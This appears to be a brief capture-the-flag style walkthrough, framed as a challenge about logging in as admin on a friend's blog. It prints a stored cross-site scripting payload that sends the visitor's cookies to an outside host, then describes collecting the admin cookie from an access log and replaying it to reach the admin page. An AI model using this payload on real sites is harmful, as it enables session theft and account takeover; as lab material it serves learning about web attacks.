A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The BlogSolution:
1. Access to the blog, Found input field (user, comment, captcha) and user, comment are vulnerable to Cross-site Scripting (XSS)
<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);</script>
3. Wait a minute and give some cookie in my site's access log.
4. "Login as admin", I guess the admin page is /admin.php found it and redirect to /login.php, Try to access with a admin's cookie